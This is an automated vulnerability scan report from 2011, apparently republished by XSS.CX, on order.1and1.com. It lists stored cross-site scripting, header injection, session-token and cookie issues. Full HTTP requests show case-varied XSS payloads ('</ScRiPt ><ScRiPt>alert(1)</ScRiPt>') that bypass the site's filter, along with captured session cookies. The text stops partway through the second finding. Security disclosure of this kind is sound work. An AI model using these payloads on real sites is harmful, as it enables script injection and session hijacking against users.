Stored XSS, Permanent Cross Site Scripting, order.1and1.com, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Mar 20 13:56:02 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. Cross-site scripting (stored)

1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

1.3. http://order.1and1.com/xml/order/Eshops [REST URL parameter 3]

1.4. http://order.1and1.com/xml/order/FeatureDatabaseDatabase [REST URL parameter 3]

1.5. http://order.1and1.com/xml/order/FeatureEmailEmail [REST URL parameter 3]

1.6. http://order.1and1.com/xml/order/FeatureEmailWebmail [REST URL parameter 3]

1.7. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback [REST URL parameter 3]

1.8. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch [REST URL parameter 3]

1.9. http://order.1and1.com/xml/order/FeatureMarketingCtrStat [REST URL parameter 3]

1.10. http://order.1and1.com/xml/order/FeatureSite-buildingCgi [REST URL parameter 3]

1.11. http://order.1and1.com/xml/order/FeatureSite-buildingDsc [REST URL parameter 3]

1.12. http://order.1and1.com/xml/order/FeatureSite-buildingElements [REST URL parameter 3]

1.13. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery [REST URL parameter 3]

1.14. http://order.1and1.com/xml/order/FeatureSite-buildingWsb [REST URL parameter 3]

1.15. http://order.1and1.com/xml/order/Gtc [REST URL parameter 3]

1.16. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

1.17. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.18. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]

1.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]

1.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]

1.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]

1.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

2. HTTP header injection

2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]

2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]

2.6. http://order.1and1.com/xml/order/Jumpto [page parameter]

2.7. http://order.1and1.com/xml/order/Jumpto [site parameter]

2.8. http://order.1and1.com/xml/order/Jumpto [sourcearea parameter]

2.9. http://order.1and1.com/xml/order/domaincheck [__lf parameter]

2.10. http://order.1and1.com/xml/order/domaincheck [jsessionid parameter]

2.11. http://order.1and1.com/xml/order/tariffselect [__lf parameter]

2.12. http://order.1and1.com/xml/order/tariffselect [jsessionid parameter]

3. Session token in URL

3.1. http://order.1and1.com/links

3.2. http://order.1and1.com/xml/order

3.3. http://order.1and1.com/xml/order/AboutUs

3.4. http://order.1and1.com/xml/order/CloudDynamicServer

3.5. http://order.1and1.com/xml/order/CloudDynamicServer

3.6. http://order.1and1.com/xml/order/Contact

3.7. http://order.1and1.com/xml/order/Domaininfo

3.8. http://order.1and1.com/xml/order/DomaininfoMove

3.9. http://order.1and1.com/xml/order/Eshops

3.10. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.11. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

3.12. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

3.13. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

3.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

3.15. http://order.1and1.com/xml/order/FeatureControlCenter

3.16. http://order.1and1.com/xml/order/FeatureDatabaseAccess

3.17. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

3.18. http://order.1and1.com/xml/order/FeatureDatabaseMssql

3.19. http://order.1and1.com/xml/order/FeatureDomainDns

3.20. http://order.1and1.com/xml/order/FeatureDomainDomains

3.21. http://order.1and1.com/xml/order/FeatureDomainPdr

3.22. http://order.1and1.com/xml/order/FeatureDreamweaver

3.23. http://order.1and1.com/xml/order/FeatureEmailEmail

3.24. http://order.1and1.com/xml/order/FeatureEmailVirusscan

3.25. http://order.1and1.com/xml/order/FeatureEmailWebmail

3.26. http://order.1and1.com/xml/order/FeatureFtpBackup

3.27. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

3.28. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

3.29. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

3.30. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

3.31. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

3.32. http://order.1and1.com/xml/order/FeatureParallelsPlesk

3.33. http://order.1and1.com/xml/order/FeatureParallelsSB

3.34. http://order.1and1.com/xml/order/FeatureSecurityCertificate

3.35. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

3.36. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

3.37. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

3.38. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

3.39. http://order.1and1.com/xml/order/FeatureServerFirewall

3.40. http://order.1and1.com/xml/order/FeatureServerHarddrive

3.41. http://order.1and1.com/xml/order/FeatureServerMonitoring

3.42. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

3.43. http://order.1and1.com/xml/order/FeatureServerProcessor

3.44. http://order.1and1.com/xml/order/FeatureServerRecovery

3.45. http://order.1and1.com/xml/order/FeatureServerSsl

3.46. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

3.47. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

3.48. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

3.49. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.50. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

3.51. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

3.52. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.53. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

3.54. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

3.55. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

3.56. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

3.57. http://order.1and1.com/xml/order/FeatureSite-buildingElements

3.58. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

3.59. http://order.1and1.com/xml/order/FeatureSite-buildingMap

3.60. http://order.1and1.com/xml/order/FeatureSite-buildingNet

3.61. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

3.62. http://order.1and1.com/xml/order/FeatureSite-buildingRss

3.63. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

3.64. http://order.1and1.com/xml/order/FeatureToolsRatepoint

3.65. http://order.1and1.com/xml/order/FeatureWebdesignIstock

3.66. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.67. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

3.68. http://order.1and1.com/xml/order/FirstWebsite

3.69. http://order.1and1.com/xml/order/Gtc

3.70. http://order.1and1.com/xml/order/Home

3.71. http://order.1and1.com/xml/order/Home

3.72. http://order.1and1.com/xml/order/Hosting

3.73. http://order.1and1.com/xml/order/Hosting

3.74. http://order.1and1.com/xml/order/Instant

3.75. http://order.1and1.com/xml/order/International

3.76. http://order.1and1.com/xml/order/Jumpto

3.77. http://order.1and1.com/xml/order/LocalSubmission

3.78. http://order.1and1.com/xml/order/Mail

3.79. http://order.1and1.com/xml/order/Mail

3.80. http://order.1and1.com/xml/order/MailInstantMail

3.81. http://order.1and1.com/xml/order/MailXchange

3.82. http://order.1and1.com/xml/order/MicrosoftExchange

3.83. http://order.1and1.com/xml/order/Moneyback

3.84. http://order.1and1.com/xml/order/MsHosting

3.85. http://order.1and1.com/xml/order/MsHosting

3.86. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

3.87. http://order.1and1.com/xml/order/News

3.88. http://order.1and1.com/xml/order/News

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

3.90. http://order.1and1.com/xml/order/Server

3.91. http://order.1and1.com/xml/order/Server

3.92. http://order.1and1.com/xml/order/ServerPremium

3.93. http://order.1and1.com/xml/order/Service

3.94. http://order.1and1.com/xml/order/Sharepoint

3.95. http://order.1and1.com/xml/order/TcSpecialOffers

3.96. http://order.1and1.com/xml/order/TellAFriend

3.97. http://order.1and1.com/xml/order/VirtualServer

3.98. http://order.1and1.com/xml/order/VirtualServer

3.99. http://order.1and1.com/xml/order/VirtualServerL

3.100. http://order.1and1.com/xml/order/VirtualServerL

3.101. http://order.1and1.com/xml/order/VirtualServerXL

3.102. http://order.1and1.com/xml/order/VirtualServerXXL

3.103. http://order.1and1.com/xml/order/a

3.104. http://order.1and1.com/xml/order/addon

3.105. http://order.1and1.com/xml/order/costs

3.106. http://order.1and1.com/xml/order/domaincheck

3.107. http://order.1and1.com/xml/order/domaincheck

3.108. http://order.1and1.com/xml/order/eshopupselling

3.109. http://order.1and1.com/xml/order/eshopupselling

3.110. http://order.1and1.com/xml/order/popupDomainPrices

3.111. http://order.1and1.com/xml/order/popupDomainPrices

3.112. http://order.1and1.com/xml/order/popupGreenPower

3.113. http://order.1and1.com/xml/order/popupPayPalInfo

3.114. http://order.1and1.com/xml/order/popupServerOsCds

3.115. http://order.1and1.com/xml/order/popupServerOsVps

3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords

3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine

3.118. http://order.1and1.com/xml/order/sitedesign

3.119. http://order.1and1.com/xml/order/tariffselect

3.120. http://order.1and1.com/xml/webservice/VDSPriceService

4. Cross-domain Referer leakage

4.1. http://order.1and1.com/xml/order/CloudDynamicServer

4.2. http://order.1and1.com/xml/order/Eshops

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

4.4. http://order.1and1.com/xml/order/Home

4.5. http://order.1and1.com/xml/order/Hosting

4.6. http://order.1and1.com/xml/order/Instant

4.7. http://order.1and1.com/xml/order/LocalSubmission

4.8. http://order.1and1.com/xml/order/Mail

4.9. http://order.1and1.com/xml/order/MailInstantMail

4.10. http://order.1and1.com/xml/order/MailXchange

4.11. http://order.1and1.com/xml/order/MicrosoftExchange

4.12. http://order.1and1.com/xml/order/MsHosting

4.13. http://order.1and1.com/xml/order/Server

4.14. http://order.1and1.com/xml/order/ServerPremium

4.15. http://order.1and1.com/xml/order/Sharepoint

4.16. http://order.1and1.com/xml/order/VirtualServer

4.17. http://order.1and1.com/xml/order/VirtualServerL

4.18. http://order.1and1.com/xml/order/eshopupselling

5. Cookie without HttpOnly flag set

5.1. http://order.1and1.com/xml/order

5.2. http://order.1and1.com/xml/order

5.3. http://order.1and1.com/xml/order/AboutUs

5.4. http://order.1and1.com/xml/order/AboutUs

5.5. http://order.1and1.com/xml/order/CloudDynamicServer

5.6. http://order.1and1.com/xml/order/CloudDynamicServer

5.7. http://order.1and1.com/xml/order/Contact

5.8. http://order.1and1.com/xml/order/Domaininfo

5.9. http://order.1and1.com/xml/order/Domaininfo

5.10. http://order.1and1.com/xml/order/DomaininfoMove

5.11. http://order.1and1.com/xml/order/DomaininfoMove

5.12. http://order.1and1.com/xml/order/Eshops

5.13. http://order.1and1.com/xml/order/Eshops

5.14. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.15. http://order.1and1.com/xml/order/FeatureCommunicationToolsChat

5.16. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.17. http://order.1and1.com/xml/order/FeatureCommunicationToolsDialogue

5.18. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.19. http://order.1and1.com/xml/order/FeatureCommunicationToolsMerchandise

5.20. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.21. http://order.1and1.com/xml/order/FeatureCommunicationToolsNewsletter

5.22. http://order.1and1.com/xml/order/FeatureControlCenter

5.23. http://order.1and1.com/xml/order/FeatureControlCenter

5.24. http://order.1and1.com/xml/order/FeatureDatabaseAccess

5.25. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.26. http://order.1and1.com/xml/order/FeatureDatabaseDatabase

5.27. http://order.1and1.com/xml/order/FeatureDatabaseMssql

5.28. http://order.1and1.com/xml/order/FeatureDomainDns

5.29. http://order.1and1.com/xml/order/FeatureDomainDns

5.30. http://order.1and1.com/xml/order/FeatureDomainDomains

5.31. http://order.1and1.com/xml/order/FeatureDomainDomains

5.32. http://order.1and1.com/xml/order/FeatureDomainPdr

5.33. http://order.1and1.com/xml/order/FeatureDomainPdr

5.34. http://order.1and1.com/xml/order/FeatureDreamweaver

5.35. http://order.1and1.com/xml/order/FeatureDreamweaver

5.36. http://order.1and1.com/xml/order/FeatureEmailEmail

5.37. http://order.1and1.com/xml/order/FeatureEmailEmail

5.38. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.39. http://order.1and1.com/xml/order/FeatureEmailVirusscan

5.40. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.41. http://order.1and1.com/xml/order/FeatureEmailWebmail

5.42. http://order.1and1.com/xml/order/FeatureFtpBackup

5.43. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback

5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub

5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat

5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk

5.54. http://order.1and1.com/xml/order/FeatureParallelsSB

5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.56. http://order.1and1.com/xml/order/FeatureSecurityCertificate

5.57. http://order.1and1.com/xml/order/FeatureServerDedOsLinux

5.58. http://order.1and1.com/xml/order/FeatureServerDedOsLinuxOpt

5.59. http://order.1and1.com/xml/order/FeatureServerDedOsWindows

5.60. http://order.1and1.com/xml/order/FeatureServerDedOsWindowsOpt

5.61. http://order.1and1.com/xml/order/FeatureServerFirewall

5.62. http://order.1and1.com/xml/order/FeatureServerHarddrive

5.63. http://order.1and1.com/xml/order/FeatureServerMonitoring

5.64. http://order.1and1.com/xml/order/FeatureServerMonitoringCloud

5.65. http://order.1and1.com/xml/order/FeatureServerProcessor

5.66. http://order.1and1.com/xml/order/FeatureServerRecovery

5.67. http://order.1and1.com/xml/order/FeatureServerSsl

5.68. http://order.1and1.com/xml/order/FeatureServerVpsOsLinux

5.69. http://order.1and1.com/xml/order/FeatureServerVpsOsWindows

5.70. http://order.1and1.com/xml/order/FeatureSite-buildingAsp

5.71. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.72. http://order.1and1.com/xml/order/FeatureSite-buildingBlog

5.73. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.74. http://order.1and1.com/xml/order/FeatureSite-buildingCgi

5.75. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.76. http://order.1and1.com/xml/order/FeatureSite-buildingCnba

5.77. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.78. http://order.1and1.com/xml/order/FeatureSite-buildingContentmoduls

5.79. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.80. http://order.1and1.com/xml/order/FeatureSite-buildingDriving

5.81. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.82. http://order.1and1.com/xml/order/FeatureSite-buildingDsc

5.83. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.84. http://order.1and1.com/xml/order/FeatureSite-buildingElements

5.85. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.86. http://order.1and1.com/xml/order/FeatureSite-buildingMailinglist

5.87. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.88. http://order.1and1.com/xml/order/FeatureSite-buildingMap

5.89. http://order.1and1.com/xml/order/FeatureSite-buildingNet

5.90. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.91. http://order.1and1.com/xml/order/FeatureSite-buildingPhotogallery

5.92. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.93. http://order.1and1.com/xml/order/FeatureSite-buildingRss

5.94. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.95. http://order.1and1.com/xml/order/FeatureSite-buildingWsb

5.96. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.97. http://order.1and1.com/xml/order/FeatureToolsRatepoint

5.98. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.99. http://order.1and1.com/xml/order/FeatureWebdesignIstock

5.100. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.101. http://order.1and1.com/xml/order/FeatureWebspaceExplorer

5.102. http://order.1and1.com/xml/order/FirstWebsite

5.103. http://order.1and1.com/xml/order/FirstWebsite

5.104. http://order.1and1.com/xml/order/Gtc

5.105. http://order.1and1.com/xml/order/Gtc

5.106. http://order.1and1.com/xml/order/Home

5.107. http://order.1and1.com/xml/order/Home

5.108. http://order.1and1.com/xml/order/Hosting

5.109. http://order.1and1.com/xml/order/Hosting

5.110. http://order.1and1.com/xml/order/Instant

5.111. http://order.1and1.com/xml/order/Instant

5.112. http://order.1and1.com/xml/order/International

5.113. http://order.1and1.com/xml/order/International

5.114. http://order.1and1.com/xml/order/Jumpto

5.115. http://order.1and1.com/xml/order/Jumpto

5.116. http://order.1and1.com/xml/order/LocalSubmission

5.117. http://order.1and1.com/xml/order/LocalSubmission

5.118. http://order.1and1.com/xml/order/Mail

5.119. http://order.1and1.com/xml/order/Mail

5.120. http://order.1and1.com/xml/order/MailInstantMail

5.121. http://order.1and1.com/xml/order/MailInstantMail

5.122. http://order.1and1.com/xml/order/MailXchange

5.123. http://order.1and1.com/xml/order/MailXchange

5.124. http://order.1and1.com/xml/order/MicrosoftExchange

5.125. http://order.1and1.com/xml/order/MicrosoftExchange

5.126. http://order.1and1.com/xml/order/Moneyback

5.127. http://order.1and1.com/xml/order/Moneyback

5.128. http://order.1and1.com/xml/order/MsHosting

5.129. http://order.1and1.com/xml/order/MsHosting9d4af%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(String.fromCharCode(88,83,83))%3C/ScRiPt%3E542f10c1a1e

5.130. http://order.1and1.com/xml/order/Mshosting

5.131. http://order.1and1.com/xml/order/News

5.132. http://order.1and1.com/xml/order/News

5.133. http://order.1and1.com/xml/order/PrivacyPolicy

5.134. http://order.1and1.com/xml/order/PrivacyPolicy

5.135. http://order.1and1.com/xml/order/Server

5.136. http://order.1and1.com/xml/order/Server

5.137. http://order.1and1.com/xml/order/ServerPremium

5.138. http://order.1and1.com/xml/order/ServerPremium

5.139. http://order.1and1.com/xml/order/Service

5.140. http://order.1and1.com/xml/order/Service

5.141. http://order.1and1.com/xml/order/Sharepoint

5.142. http://order.1and1.com/xml/order/Sharepoint

5.143. http://order.1and1.com/xml/order/TcSpecialOffers

5.144. http://order.1and1.com/xml/order/TcSpecialOffers

5.145. http://order.1and1.com/xml/order/TellAFriend

5.146. http://order.1and1.com/xml/order/TellAFriend

5.147. http://order.1and1.com/xml/order/VirtualServer

5.148. http://order.1and1.com/xml/order/VirtualServer

5.149. http://order.1and1.com/xml/order/VirtualServerL

5.150. http://order.1and1.com/xml/order/VirtualServerL

5.151. http://order.1and1.com/xml/order/VirtualServerXL

5.152. http://order.1and1.com/xml/order/VirtualServerXXL

5.153. http://order.1and1.com/xml/order/a

5.154. http://order.1and1.com/xml/order/addon

5.155. http://order.1and1.com/xml/order/costs

5.156. http://order.1and1.com/xml/order/domaincheck

5.157. http://order.1and1.com/xml/order/domaincheck

5.158. http://order.1and1.com/xml/order/eshopupselling

5.159. http://order.1and1.com/xml/order/eshopupselling

5.160. http://order.1and1.com/xml/order/popupDomainPrices

5.161. http://order.1and1.com/xml/order/popupDomainPrices

5.162. http://order.1and1.com/xml/order/popupGreenPower

5.163. http://order.1and1.com/xml/order/popupGreenPower

5.164. http://order.1and1.com/xml/order/popupPayPalInfo

5.165. http://order.1and1.com/xml/order/popupServerOsCds

5.166. http://order.1and1.com/xml/order/popupServerOsVps

5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords

5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine

5.170. http://order.1and1.com/xml/order/sitedesign

5.171. http://order.1and1.com/xml/order/tariffselect

5.172. http://order.1and1.com/xml/order/tariffselect

6. Email addresses disclosed

6.1. http://order.1and1.com/xml/order/FeatureDomainPdr

6.2. http://order.1and1.com/xml/order/International

6.3. http://order.1and1.com/xml/order/Mail

6.4. http://order.1and1.com/xml/order/MailXchange

6.5. http://order.1and1.com/xml/order/PrivacyPolicy

7. Content type incorrectly stated



1. Cross-site scripting (stored)
There are 26 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://order.1and1.com/xml/order/CloudDynamicServer [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/CloudDynamicServerbe5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyEhIB4cNTg=; Expires=Fri, 07-Apr-2079 21:08:22 GMT; Path=/
ETag: dafe46acb36a9f556844954eae96d32c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63338


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
pfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="CloudDynamicServer";UNOUNO.params.lastpage="CloudDynamicServerbe5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

1.2. http://order.1and1.com/xml/order/DomaininfoMove [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/DomaininfoMove

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

